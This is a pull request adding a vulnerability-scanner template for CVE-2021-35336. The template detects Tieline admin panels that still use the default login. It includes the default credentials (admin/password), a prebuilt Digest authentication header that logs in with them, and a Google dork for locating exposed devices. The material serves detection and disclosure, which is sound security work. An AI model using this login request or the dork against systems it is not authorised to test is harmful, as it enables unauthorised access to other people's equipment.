### PR TITLE
Tieline Default Credentials - Create CVE-2021-35336

### DIFF
--- a/default-logins/Tieline/Tieline.yaml
+++ b/default-logins/Tieline/Tieline.yaml
@@ -1,0 +1,40 @@
+id: Tieline-default-credentials
+
+info:
+  name: Tieline Default Credentials Detection Template
+  author: Pratik Khalane
+  severity: high
+  description: Finding the  Tieline Admin Panels with default credentials.
+  reference: https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
+  tags: Tieline,default-login
+
+#Payloads:
+
+#Username - admin
+#Password - password
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/api/get_device_details'
+    headers:
+      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+      Referer: '{{BaseURL}}/assets/base/home.html'
+      Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"'
+    
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<SERIAL>"
+          - "<VERSION>"
+        condition: and
+
+      - type: word
+        words:
+          - "text/xml"
+        part: header
+
+      - type: status
+        status:
+          - 200

--- a/default-logins/tieline/tieline.yaml
+++ b/default-logins/tieline/tieline.yaml
@@ -20,7 +20,7 @@ requests:
       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
       Referer: '{{BaseURL}}/assets/base/home.html'
       Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"'
-    
+
     matchers-condition: and
     matchers:
       - type: word

--- a/default-logins/tieline/tieline.yaml
+++ b/default-logins/tieline/tieline.yaml
@@ -1,12 +1,12 @@
-id: Tieline-default-credentials
+id: tieline-default-credentials
 
 info:
-  name: Tieline Default Credentials Detection Template
+  name: Tieline Default Credentials
   author: Pratik Khalane
   severity: high
-  description: Finding the  Tieline Admin Panels with default credentials.
+  description: Finding the Tieline Admin Panels with default credentials.
   reference: https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
-  tags: Tieline,default-login
+  tags: tieline,default-login
 
 #Payloads:
 

--- a/default-logins/tieline/tieline.yaml
+++ b/default-logins/tieline/tieline.yaml
@@ -9,7 +9,6 @@ info:
   tags: tieline,default-login
 
 #Payloads:
-
 #Username - admin
 #Password - password
 


### PR DESCRIPTION
### Template / PR Information

-   Add **CVE-2021-35336**

-  References: https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c

### Template Validation

I've validated this template locally?

- [ ] YES

### Additional Details: 

Google Dork :  intext:2.6.4.8 - © 2019 tieline pty ltd

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)